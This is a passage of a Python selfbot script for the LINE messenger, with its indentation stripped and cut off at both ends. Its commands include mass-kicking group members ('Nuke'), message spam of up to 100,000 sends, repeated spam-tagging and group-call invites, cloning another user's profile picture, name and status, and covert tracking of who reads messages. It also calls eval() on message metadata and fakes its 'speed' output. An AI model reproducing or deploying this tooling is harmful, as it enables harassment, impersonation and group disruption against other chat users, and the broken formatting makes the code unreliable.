81.║✍ ᴄᴇᴋ sɪᴅᴇʀᴛᴇxᴛ
82.║✍ sᴇᴛ ᴀᴜᴛᴏʟɪᴋᴇ
83.║✍ ᴄᴇᴋ ᴀᴜᴛᴏʟɪᴋᴇ
"""
return helpMessage
#==============================================================================#
def lineBot(op):
try:
if op.type == 0:
print ("[ 0 ] END OF OPERATION")
return
if op.type == 5:
print ("[ 5 ] NOTIFIED ADD CONTACT")
if settings["autoAdd"] == True:
line.sendMessage(op.param1, "ʜᴀʟʟᴏ {} ᴛx ғᴏʀ ᴀᴅᴅ ᴍᴇ\nʙʏ: ᴛᴇᴀᴍ ᴅᴋᴢ ᴘʀᴏᴛᴇᴄᴛɪᴏɴ ".format(str(line.getContact(op.param1).displayName)))
if op.type == 15:
print ("[ 15 ] MEMBER LEAVE GROUP")
if settings["leavemsg"] == True:
contact = line.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
text = "ɢᴏᴏᴅ ʙʏᴇ @!\n{}".format(str(settings["keluar"]))
sendMentionV2(op.param1, text, [op.param2])
line.sendImageWithURL(op.param1,image)
if op.type == 17:
if settings["welcomemsg"] == True:
if op.param2 in lineMID:
return
ginfo = line.getGroup(op.param1)
contact = line.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
summon(op.param1,[op.param2])
line.sendMessage(op.param1,"ʜᴀʟʟᴏ ☛ " + line.getContact(op.param2).displayName + "\nᴡᴇʟᴄᴏᴍᴇ ᴛᴏ ɢʀᴏᴜᴘ ☛ " + str(ginfo.name)+"\n"+(str(settings["welcome"])))
line.sendImageWithURL(op.param1,image)
print ("MEMBER JOIN THE GROUP")
if op.type == 5:
print ("[ 5 ] NOTIFIED AUTO BLOCK CONTACT")
if settings["autoblock"] == True:
line.sendMessage(op.param1, "Halo {} \nThank yah \nSory akun saya Autoblock ".format(str(line.getContact(op.param1).displayName)))
line.blockContact(op.param1)
if op.type == 13:
print ("[ 13 ] NOTIFIED INVITE GROUP")
group = line.getGroup(op.param1)
if settings["autoJoin"] == True:
line.acceptGroupInvitation(op.param1)
if op.type == 24:
print ("[ 24 ] NOTIFIED LEAVE ROOM")
if settings["autoLeave"] == True:
line.leaveRoom(op.param1)
if op.type == 25:
print ("[ 25 ] SEND MESSAGE")
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0:
if sender != line.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if msg.contentType == 0:
if text is None:
return
#==============================================================================#
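                # Text commands below are matched case-insensitively on msg.text; replies go to `to`
                # (the sender for 1:1 chats, otherwise the group/room the message came from).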
elif text.lower() == 'help':
helpMessage = helpmessage()
jp1 = line.getContact(lineMID).displayName
line.sendMessage(to,str(helpMessage) + "╭════════════════════╮\n❨✪❩ ᴠɪᴇᴡ sᴇᴛᴛɪɴɢs = sᴇᴛ \n❨✪❩ ᴠɪᴇᴡ ɪɴғᴏ ʙᴏᴛ = ᴀʙᴏᴜᴛ \n❨✪❩ ʜᴇʟᴘᴍᴇssᴀɢᴇ ʙʏ : " + jp1+ "\n╰════════════════════╯\n ™ ᴛᴇᴀᴍ ᴅᴋᴢ ᴘʀᴏᴛᴇᴄᴛɪᴏɴ ™\n")
#==============================================================================#
elif text.lower() == 'speed' or text.lower() == 'sp':
line.sendMessage(to, "progres...")
line.sendMessage(to,str(time.time()/1000000000000.0)+" seconds")
elif text.lower() == 'reboot':
line.sendMessage(to, "I'II come back latter")
line.sendMessage(to, "Restarted done ♪")
restartBot()
elif text.lower() == 'runtime':
eltime = time.time() -mulai
van = "╭════════════════════╮\n Mybot sudah berjalan selama\n " +waktu(eltime)+"\n╰════════════════════╯"
line.sendMessage(to,van)
elif text.lower() == 'about':
try:
arr = []
owner = "u9922f516e7fac1ea266f55a148e76217"
creator = line.getContact(owner)
contact = line.getContact(lineMID)
grouplist = line.getGroupIdsJoined()
contactlist = line.getAllContactIds()
blockedlist = line.getBlockedContactIds()
ret_ = "____________________________\n❨✪❩ Impormation Selfbot ❨✪❩\n____________________________"
ret_ += "\n┃❨✪❩ Line Name : {}".format(contact.displayName)
ret_ += "\n┃❨✪❩ Groups : {}".format(str(len(grouplist)))
ret_ += "\n┃❨✪❩ Friends : {}".format(str(len(contactlist)))
ret_ += "\n┃❨✪❩ Blocked : {}".format(str(len(blockedlist)))
ret_ += "\n┃❨✪❩ Version1 : Python3 Update"
ret_ += "\n┃❨✪❩ Version2 : Premium server"
ret_ += "\n┃❨✪❩ Server : Gnu Linux 48"
ret_ += "\n┃❨✪❩ Masa Aktif : 28-09-2018"
ret_ += "\n┃❨✪❩ Creator : {}".format(creator.displayName)
ret_ += "\n____________________________"
line.sendMessage(to, str(ret_))
except Exception as e:
line.sendMessage(msg.to, str(e))
#==============================================================================#
elif text.lower() == 'set' or text.lower() == 'myset':
try:
ret_ = "╭═════════════════╮\n"
ret_ += " ❨✪❩ sᴇᴛᴛɪɴɢs ᴍʏʙᴏᴛ ❨✪❩\n"
ret_ += "╰═════════════════╯\n"
if settings["autoAdd"] == True: ret_ += "01.┃ᴀᴜᴛᴏᴀᴅᴅ ᴏɴ \n"
else: ret_ += "01.┃ᴀᴜᴛᴏᴀᴅᴅ ᴏғғ \n"
if settings["autoblock"] == True: ret_ += "02.┃ᴀᴜᴛᴏʙʟᴏᴄᴋ ᴏɴ \n"
else: ret_ += "02.┃ᴀᴜᴛᴏʙʟᴏᴄᴋ ᴏғғ \n"
if settings["contact"] == True: ret_ += "03.┃ᴄᴏɴᴛᴀᴄᴛ ᴏɴ \n"
else: ret_ += "03.┃ᴄᴏɴᴛᴀᴄᴛ ᴏғғ \n"
if settings["autoJoin"] == True: ret_ += "04.┃ᴀᴜᴛᴏᴊᴏɪɴ ᴏɴ \n"
else: ret_ += "04.┃ᴀᴜᴛᴏᴊᴏɪɴ ᴏғғ \n"
if settings["mimic"]["status"] == True: ret_ += "05.┃ᴍɪᴍɪᴄ ᴏɴ \n"
else: ret_ += "05.┃ᴍɪᴍɪᴄ ᴏғғ \n"
if settings["welcomemsg"] == True: ret_+= "06.┃ᴡᴇʟᴄᴏᴍᴇ ᴏɴ \n"
else: ret_ +="06.┃ᴡᴇʟᴄᴏᴍᴇ ᴏғғ \n"
if settings["leavemsg"] == True: ret_+= "07.┃ʟᴇᴀᴠᴇᴍsɢ ᴏɴ \n"
else: ret_ +="07.┃ʟᴇᴀᴠᴇᴍsɢ ᴏғғ \n"
if settings["autoLeave"] == True: ret_ += "08.┃ᴀᴜᴛᴏʟᴇᴀᴠᴇ ᴏɴ \n"
else: ret_ += "08.┃ᴀᴜᴛᴏʟᴇᴀᴠᴇ ᴏғғ \n"
if settings["autoRead"] == True: ret_ += "09.┃ᴀᴜᴛᴏʀᴇᴀᴅ ᴏɴ \n"
else: ret_ += "09.┃ᴀᴜᴛᴏʀᴇᴀᴅ ᴏғғ \n"
if settings["checkSticker"] == True: ret_ += "10.┃ᴄᴇᴋsᴛɪᴄᴋᴇʀ ᴏɴ \n"
else: ret_ += "10.┃ᴄᴇᴋsᴛɪᴄᴋᴇʀ ᴏғғ \n"
if settings["autoRespon"] == True: ret_ += "11.┃ʀᴇsᴘᴏɴ1 ᴏɴ \n"
else: ret_ += "11.┃ʀᴇsᴘᴏɴ1 ᴏғғ \n"
if settings["autoResponImage"] == True: ret_ += "12.┃ʀᴇsᴘᴏɴ2 ᴏɴ \n"
else: ret_ += "12.┃ʀᴇsᴘᴏɴ2 ᴏғғ \n"
if settings["autoResponPm"] == True: ret_ += "13.┃ʀᴇsᴘᴏɴ3 ᴏɴ \n"
else: ret_ += "13.┃ʀᴇsᴘᴏɴ3 ᴏғғ \n"
if settings["responPc"] == True: ret_ += "14.┃ʀᴇsᴘᴏɴᴘᴄ ᴏɴ \n"
else: ret_ += "14.┃ʀᴇsᴘᴏɴᴘᴄ ᴏғғ \n"
if settings["protect"] == True: ret_ += "15.┃ᴘʀᴏᴛᴇᴄᴛ ᴏɴ \n"
else: ret_ += "15.┃ᴘʀᴏᴛᴇᴄᴛ ᴏғғ \n"
if settings["qrprotect"] == True: ret_ += "16.┃ʟɪɴᴋᴘʀᴏᴛᴇᴄᴛ ᴏɴ \n"
else: ret_ += "16.┃ʟɪɴᴋᴘʀᴏᴛᴇᴄᴛ ᴏғғ \n"
if settings["autorejc"] == True: ret_ += "17.┃ᴀᴜᴛᴏʀᴇᴊᴇᴄᴛ ᴏɴ \n"
else: ret_ += "17.┃ᴀᴜᴛᴏʀᴇᴊᴇᴄᴛ ᴏғғ \n"
if settings["autoKick"] == True: ret_ += "18.┃ᴀᴜᴛᴏᴋɪᴄᴋ ᴏɴ \n"
else: ret_ += "18.┃ᴀᴜᴛᴏᴋɪᴄᴋ ᴏғғ \n"
ret_ += "╭═════════════════╮"
jp = line.getContact(lineMID).displayName
line.sendMessage(to, str(ret_)+"\n ❨✪❩ ʟɪɴᴇ ɴᴀᴍᴇ : "+jp+"\n ❨✪❩ ᴅᴋᴢ ᴘʀᴏᴛᴇᴄᴛɪᴏɴ ❨✪❩\n╰═════════════════╯")
except Exception as e:
line.sendMessage(msg.to, str(e))
elif text.lower() == 'allsettings mode on':
settings["autoAdd"] = True
settings["autoblock"] = True
settings["contact"] = True
settings["autoJoin"] = True
settings["mimic"]["status"] = True
settings["welcomemsg"] = True
settings["leavemsg"] = True
settings["autoLeave"] = True
settings["autoRead"] = True
settings["checkSticker"] = True
settings["autoRespon"] = True
settings["autoResponImage"] = True
settings["autoResponPm"] = True
settings["responPc"] = True
settings["protect"] = True
settings["qrprotect"] = True
settings["autorejc"] = True
settings["autoKick"] = True
line.sendMessage(to, "All Setting Bot Mode On")
elif text.lower() == 'allsettings mode off':
settings["autoAdd"] = False
settings["autoblock"] = False
settings["contact"] = False
settings["autoJoin"] = False
settings["mimic"]["status"] = False
settings["welcomemsg"] = False
settings["leavemsg"] = False
settings["autoLeave"] = False
settings["autoRead"] = False
settings["checkSticker"] = False
settings["autoRespon"] = False
settings["autoResponImage"] = False
settings["autoResponPm"] = False
settings["responPc"] = False
settings["protect"] = False
settings["qrprotect"] = False
settings["autorejc"] = False
settings["autoKick"] = False
line.sendMessage(to, "All Setting Bot Mode Off")
elif text.lower() == 'clear ban':
line.sendMessage(to, "Removed banlist success")
elif text.lower() == 'autoadd on':
settings["autoAdd"] = True
line.sendMessage(to, "AutoAdd already On")
elif text.lower() == 'autoadd off':
settings["autoAdd"] = False
line.sendMessage(to, "AutoAdd already Off")
elif text.lower() == 'autoblock on':
settings["autoblock"] = True
line.sendMessage(to, "AutoBlock already On")
elif text.lower() == 'autoblock off':
settings["autoblock"] = False
line.sendMessage(to, "AutoBlock already Off")
elif text.lower() == 'autojoin on':
settings["autoJoin"] = True
line.sendMessage(to, "AutoJoin already On")
elif text.lower() == 'autojoin off':
settings["autoJoin"] = False
line.sendMessage(to, "AutoJoin already Off")
elif text.lower() == 'autoleave on':
settings["autoLeave"] = True
line.sendMessage(to, "AutoLeave already On")
elif text.lower() == 'autoleave off':
settings["autoLeave"] = False
line.sendMessage(to, "AutoLeave already Off")
elif text.lower() == 'autoread on':
settings["autoRead"] = True
line.sendMessage(to, "Autoread Chat already On")
elif text.lower() == 'autoread off':
settings["autoRead"] = False
line.sendMessage(to, "Autoread Chat already Off")
elif text.lower() == 'ceksticker on':
settings["checkSticker"] = True
line.sendMessage(to, "CekStiker already On")
elif text.lower() == 'ceksticker off':
settings["checkSticker"] = False
line.sendMessage(to, "CekStiker already Off")
elif text.lower() == 'autokick on':
if sender in lineMID:
settings["autoKick"] = True
line.sendMessage(to, "AutoKick Di Aktifkan")
elif text.lower() == 'autokick off':
if sender in lineMID:
settings["autoKick"] = False
line.sendMessage(to, "AutoKick Turned Off")
elif text.lower() == 'respon1 on':
if sender in lineMID:
settings["autoRespon"] = True
line.sendMessage(to, "Autorespon1 Text di Aktifkan")
elif text.lower() == 'respon1 off':
if sender in lineMID:
settings["autoRespon"] = False
line.sendMessage(to, "Autorespon1 Text Off")
elif text.lower() == 'respon2 on':
if sender in lineMID:
settings["autoResponImage"] = True
line.sendMessage(to, "Autorespon2 TagImage di Aktifkan")
elif text.lower() == 'respon2 off':
if sender in lineMID:
settings["autoResponImage"] = False
line.sendMessage(to, "Autorespon2 Image Off")
elif text.lower() == 'respon3 on':
if sender in lineMID:
settings["autoResponPm"] = True
line.sendMessage(to, "Autorespon3 PM di Aktifkan")
elif text.lower() == 'respon3 off':
if sender in lineMID:
settings["autoResponPm"] = False
line.sendMessage(to, "Autorespon3 PM Off")
elif text.lower() == 'responpc on':
if sender in lineMID:
settings["responPc"] = True
line.sendMessage(to, "Autorespon Tagpc di Aktifkan")
elif text.lower() == 'responpc off':
if sender in lineMID:
settings["responPc"] = False
line.sendMessage(to, "Autorespon Tagpc Off")
elif text.lower() == 'protect on':
if sender in lineMID:
if settings["protect"] == True:
if settings["lang"] == "JP":
line.sendMessage(to," Protection Already On")
else:
line.sendMessage(to,"Protection Already On")
else:
settings["protect"] = True
if settings["lang"] == "JP":
line.sendMessage(to,"Protection Already On")
else:
line.sendMessage(to,"Protection Already On")
elif text.lower() == 'protect off':
if sender in lineMID:
if settings["protect"] == False:
if settings["lang"] == "JP":
line.sendMessage(to," Protection Already Off ")
else:
line.sendMessage(to,"Protection Already Off ")
else:
settings["protect"] = False
if settings["lang"] == "JP":
line.sendMessage(to,"Protection Already Off ")
else:
line.sendMessage(to,"Protection Already Off ")
elif text.lower() == 'linkprotect on':
if sender in lineMID:
if settings["qrprotect"] == True:
if settings["lang"] == "JP":
line.sendMessage(to,"Linkprotect Already On ")
else:
line.sendMessage(to,"Linkprotect Already On ")
else:
settings["qrprotect"] = True
if settings["lang"] == "JP":
line.sendMessage(to,"Linkprotect Already On ")
else:
line.sendMessage(to,"Linkprotect Already On ")
elif text.lower() == 'linkprotect off':
if sender in lineMID:
if settings["qrprotect"] == False:
if settings["lang"] == "JP":
line.sendMessage(to,"Linkprotect Already Off ")
else:
line.sendMessage(to,"Linkprotect Already Off ")
else:
settings["qrprotect"] = False
if settings["lang"] == "JP":
line.sendMessage(to,"Linkprotect Already Off ")
else:
line.sendMessage(to,"Linkprotect Already Off ")
#==============================================================================#
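                # Profile / contact commands: send own contact card, mid, picture, cover, video profile, etc.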
elif text.lower() == 'aku' or text.lower() == 'me':
sendMessageWithMention(to, lineMID)
line.sendContact(to, lineMID)
me = line.getContact(lineMID)
line.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus)
elif text.lower() == 'mid':
line.sendMessage(msg.to,lineMID)
elif text.lower() == 'tagme':
sendMessageWithMention(to, lineMID)
#==============================================================================#
elif text.lower() == 'creator':
line.sendContact(to, "u9922f516e7fac1ea266f55a148e76217")
elif text.lower() == 'myname':
me = line.getContact(lineMID)
line.sendMessage(msg.to,"DisplayName:\n\n" + me.displayName)
elif text.lower() == "update pict":
settings["changePicture"] = True
line.sendMessage(to, "Send image")
elif text.lower() == "update pict group":
if msg.toType == 2:
if to not in settings["changeGroupPicture"]:
settings["changeGroupPicture"].append(to)
line.sendMessage(to, "Send image ")
elif text.lower() == 'mybio':
me = line.getContact(lineMID)
line.sendMessage(msg.to,"StatusMessage:\n\n" + me.statusMessage)
elif text.lower() == 'pp':
me = line.getContact(lineMID)
line.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus)
elif text.lower() == 'myvid':
me = line.getContact(lineMID)
line.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + me.pictureStatus + "/vp")
elif text.lower() == 'cover':
me = line.getContact(lineMID)
cover = line.getProfileCoverURL(lineMID)
line.sendImageWithURL(msg.to, cover)
#___________________UNSEND_______________
elif text.lower() == 'unsend:on':
if msg._from in lineMID:
wait["unsend"] = True
line.sendMessage(msg.to, "Unsend message enable")
elif text.lower() == 'unsend:off':
if msg._from in lineMID:
wait["unsend"] = False
line.sendMessage(msg.to, "Unsend message disable")
elif msg.text.lower().startswith("getcontact "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = line.getContact(ls)
mi_d = contact.mid
line.sendContact(msg.to, mi_d)
elif msg.text.lower().startswith("mid "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
ret_ = ls
line.sendMessage(msg.to, str(ret_))
elif msg.text.lower().startswith("getname "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = line.getContact(ls)
line.sendMessage(msg.to, "[ Display Name ]\n" + contact.displayName)
elif msg.text.lower().startswith("getbio "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = line.getContact(ls)
line.sendMessage(msg.to, "[ Status Message ]\n{}" + contact.statusMessage)
elif msg.text.lower().startswith("pict "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
path = "http://dl.profile.line.naver.jp/" + line.getContact(ls).pictureStatus
line.sendImageWithURL(msg.to, str(path))
elif msg.text.lower().startswith("get videoprofile "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
path = "http://dl.profile.line.naver.jp/" + line.getContact(ls).pictureStatus + "/vp"
line.sendImageWithURL(msg.to, str(path))
#_______________VKICK______________________
elif "vkick" in text.lower():
if 'MENTION' in msg.contentMetadata.keys() != None:
names = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
try:
line.kickoutFromGroup(msg.to, [mention['M']])
line.inviteIntoGroup(msg.to,[mention['M']])
line.cancelGroupInvitation(msg.to,[mention['M']])
except:
line.sendMessage(to, "Error")
#_____________KICK____________________
elif "kick" in text.lower():
if 'MENTION' in msg.contentMetadata.keys() != None:
names = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
try:
line.kickoutFromGroup(msg.to, [mention['M']])
except:
line.kickoutFromGroup(msg.to, [mention['M']])
else:
pass
#_____________NUKE_________________
elif "Nuke" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Nuke","")
gs = line.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
line.sendMessage(msg.to,"Not found.")
else:
for target in targets:
try:
line.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
pass
elif "Nk:" in msg.text:
if msg.toType == 2:
_name = msg.text.replace("Nk:","")
gs = line.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
line.sendMessage(msg.to,"Not found.")
else:
for target in targets:
try:
line.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
pass
elif msg.text.lower().startswith("cover "):
if line != None:
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
path = line.getProfileCoverURL(ls)
line.sendImageWithURL(msg.to, str(path))
elif msg.text.lower().startswith("copy "):
if msg._from in lineMID:
#script clone profile Eg Scr
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
link = "http://dl.profile.line-cdn.net/" + line.getContact(ls).pictureStatus
path = line.downloadFileURL(str(link))
contact = line.getContact(ls)
line.updateProfilePicture(path)
nama = line.getProfile()
nama.displayName = contact.displayName
line.updateProfile(nama)
status = line.getProfile()
status.statusMessage = contact.statusMessage
line.updateProfile(status)
jp = line.getContact(sender).displayName
line.sendMessage(msg.to,"Berhasil Clone Profile "+jp)
elif text.lower() == 'backup':
try:
line.updateProfilePicture(mybackup.pictureStatus)
line.updateProfile(mybackup)
line.sendMessage(msg.to, "Backup profile succes...")
except Exception as e:
line.sendMessage(msg.to, str (e))
elif text.lower() == 'res':
try:
link = "http://dl.profile.line.naver.jp/" + contact.pictureStatus
path = line.downloadFileURL(str(link))
contact = line.getContact(lineMID)
line.updateProfilePicture(path)
nama = line.getProfile()
nama.displayName = str(myProfile["displayName"])
line.updateProfile(nama)
status = line.getProfile()
status.statusMessage = str(myProfile["statusMessage"])
line.updateProfile(status)
line.sendMessage(msg.to, "Done Backup Profile ")
except:
line.sendMessage(msg.to, "Invalid")
elif msg.text.lower().startswith("restore"):
if msg._from in lineMID:
try:
lineProfile.displayName = str(myProfile["displayName"])
lineProfile.statusMessage = str(myProfile["statusMessage"])
lineProfile.pictureStatus = str(myProfile["pictureStatus"])
line.updateProfileAttribute(8, lineProfile.pictureStatus)
line.updateProfile(lineProfile)
sendMention(msg.to, sender, "「 Restore Profile 」\nNama ", " \nBerhasil restore profile")
except:
line.sendMessage(msg.to, "Gagal restore profile")
elif text.lower() == 'pmpict':
contact = line.getContact(msg.to)
path =("http://dl.profile.line-cdn.net/" + contact.pictureStatus)
line.sendImageWithURL(msg.to, path)
elif text.lower() == 'pmcover':
contact = line.getContact(msg.to)
cu = line.getProfileCoverURL(msg.to)
#cu = channel.getProfileCoverURL(msg.to)
#h = client.getHome(msg.to)
path = str(cu)
line.sendImageWithURL(msg.to, path)
elif msg.text.lower().startswith("gcall "):
if msg.toType == 2:
sep = text.split(" ")
strnum = text.replace(sep[0] + " ","")
num = int(strnum)
line.sendMessage(to, "Mengundang %s call grup!" %str(num))
for var in range(0,num):
group = line.getGroup(to)
members = [contact.mid for contact in group.members]
line.acquireGroupCallRoute(to)
line.inviteIntoGroupCall(to, contactIds=members)
elif msg.text.lower().startswith("jumlahtag: "):
#if wait["selfbot"] == True:
if sender in lineMID:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
Setmain["RAlimit"] = num
line.sendMessage(msg.to,"♻Total Spamtag Diubah Menjadi " +strnum)
elif msg.text.lower().startswith("colek "):
#if wait["selfbot"] == True:
if sender in lineMID:
if 'MENTION' in msg.contentMetadata.keys()!=None:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
zx = ""
zxc = " "
zx2 = []
pesan2 = "@a"" "
xlen = str(len(zxc))
xlen2 = str(len(zxc)+len(pesan2)-1)
zx = {'S':xlen, 'E':xlen2, 'M':key1}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
msg.text = zxc
lol = {'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
msg.contentMetadata = lol
jmlh = int(Setmain["RAlimit"])
if jmlh <= 1000:
for x in range(jmlh):
try:
line.sendMessage1(msg)
except Exception as e:
line.sendMessage(msg.to,str(e))
else:
line.sendMessage(msg.to,"Jumlah melebihi 1000")
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
line.sendMessage(msg.to, teks)
else:
line.sendMessage(msg.to, "")
elif txt[1] == "off":
if jmlh <= 100000:
line.sendMessage(msg.to, tulisan)
else:
line.sendMessage(msg.to, "")
elif msg.text in ["."]:
line.sendMessage(msg.to,"Assalamu alaikum wr.wb...")
elif msg.text in [".."]:
line.sendMessage(msg.to,"Wa'alaikum salam wr.wb...")
#==============================================================================#
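                # Mimic commands: targets are stored in settings["mimic"]["target"] and their
                # messages are echoed back when settings["mimic"]["status"] is True (see the op.type 26 handler).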
elif msg.text.lower().startswith("mimicadd "):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
settings["mimic"]["target"][target] = True
line.sendMessage(msg.to,"Target ditambahkan!")
break
except:
line.sendMessage(msg.to,"Added Target Fail !")
break
elif msg.text.lower().startswith("mimicdel "):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del settings["mimic"]["target"][target]
line.sendMessage(msg.to,"Target dihapuskan!")
break
except:
line.sendMessage(msg.to,"Deleted Target Fail !")
break
elif text.lower() == 'mimiclist':
if settings["mimic"]["target"] == {}:
line.sendMessage(msg.to,"Tidak Ada Target")
else:
mc = "╔══[ Mimic List ]"
for mi_d in settings["mimic"]["target"]:
mc += "\n╠ "+line.getContact(mi_d).displayName
line.sendMessage(msg.to,mc + "\n╚══[◑ The End ◑]")
elif "autoreject " in msg.text.lower():
xpesan = msg.text.lower()
xres = xpesan.replace("autoreject ","")
if xres == "off":
settings['autorejc'] = False
line.sendMessage(msg.to,"AutoReject already Off")
elif xres == "on":
settings['autorejc'] = True
line.sendMessage(msg.to,"AutoReject already On")
elif text.lower() == 'contact on':
if settings["contact"] == True:
if settings["lang"] == "JP":
line.sendMessage(to,"Contact turned On")
else:
line.sendMessage(to,"Contact turned On")
else:
settings["contact"] = True
if settings["lang"] == "JP":
line.sendMessage(to,"Contact turned On")
else:
line.sendMessage(to,"Contact turned On")
elif text.lower() == 'contact off':
if settings["contact"] == False:
if settings["lang"] == "JP":
line.sendMessage(to,"Contact turned Off")
else:
line.sendMessage(to,"Contact turned Off")
else:
settings["contact"] = False
if settings["lang"] == "JP":
line.sendMessage(to,"Contact turned Off")
else:
line.sendMessage(to,"Contact turned Off")
elif "mimic " in msg.text.lower():
sep = text.split(" ")
mic = text.replace(sep[0] + " ","")
if mic == "on":
if settings["mimic"]["status"] == False:
settings["mimic"]["status"] = True
line.sendMessage(msg.to,"Reply Message On")
elif mic == "off":
if settings["mimic"]["status"] == True:
settings["mimic"]["status"] = False
line.sendMessage(msg.to,"Reply Message Off")
elif msg.text.lower().startswith("sider on"):
try:
del cctv['point'][msg.to]
del cctv['sidermem'][msg.to]
del cctv['cyduk'][msg.to]
except:
pass
cctv['point'][msg.to] = msg.id
cctv['sidermem'][msg.to] = ""
cctv['cyduk'][msg.to]=True
line.sendMessage(msg.to,"Sider Dkz turned On")
elif msg.text.lower().startswith("sider off"):
if msg.to in cctv['point']:
cctv['cyduk'][msg.to]=False
line.sendMessage(msg.to, "ᴄᴄᴛv ʏᴀɴɢ ᴛᴇʀᴛᴀɴɢᴋᴀᴘ:\n"+cctv['sidermem'][msg.to])
line.sendMessage(to,"Sider Dkz turned Off")
else:
line.sendMessage(msg.to, "On aja belum ")
#==============================================================================#
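                # Welcome / leave-message toggles; the texts themselves are changed with
                # "Set welcome ..." and "Set leavemsg ..." further below.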
elif text.lower() == 'welcome on':
if settings["welcomemsg"] == True:
if settings["lang"] == "JP":
line.sendMessage(to,"WelcomeMessage Turned On")
else:
settings["welcomemsg"] = True
if settings["lang"] == "JP":
line.sendMessage(to,"WelcomeMessage Turned On")
elif text.lower() == 'welcome off':
if settings["welcomemsg"] == False:
if settings["lang"] == "JP":
line.sendMessage(to,"WelcomeMessage Turned Off")
else:
settings["welcomemsg"] = False
if settings["lang"] == "JP":
line.sendMessage(to,"WelcomeMessage Turned Off")
#==============================================================================#
elif text.lower() == 'leavemsg on':
if settings["leavemsg"] == True:
if settings["lang"] == "JP":
line.sendMessage(to,"LeaveMessage Turned On")
else:
settings["leavemsg"] = True
if settings["lang"] == "JP":
line.sendMessage(to,"LeaveMessage Turned On")
elif text.lower() == 'leavemsg off':
if settings["leavemsg"] == False:
if settings["lang"] == "JP":
line.sendMessage(to,"LeaveMessage Turned Off")
else:
settings["leavemsg"] = False
if settings["lang"] == "JP":
line.sendMessage(to,"LeaveMessage Turned Off")
#--------------------------------------------------------
elif 'Set welcome ' in msg.text:
if msg._from in lineMID:
spl = msg.text.replace('Set welcome ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti Welcome")
else:
settings["welcome"] = spl
line.sendMessage(msg.to, "WelcomeMessage diubah jadi :\n\n{}".format(str(spl)))
elif text.lower() == "cek welcome":
if msg._from in lineMID:
line.sendMessage(msg.to, "WelcomeMessage :\n\n" + str(settings["welcome"]))
#--------------------------------------------------------
elif 'Set leavemsg ' in msg.text:
if msg._from in lineMID:
spl = msg.text.replace('Set leavemsg ','')
if spl in [""," ","\n",None]:
line.sendMessage(msg.to, "Gagal mengganti LeaveMsg")
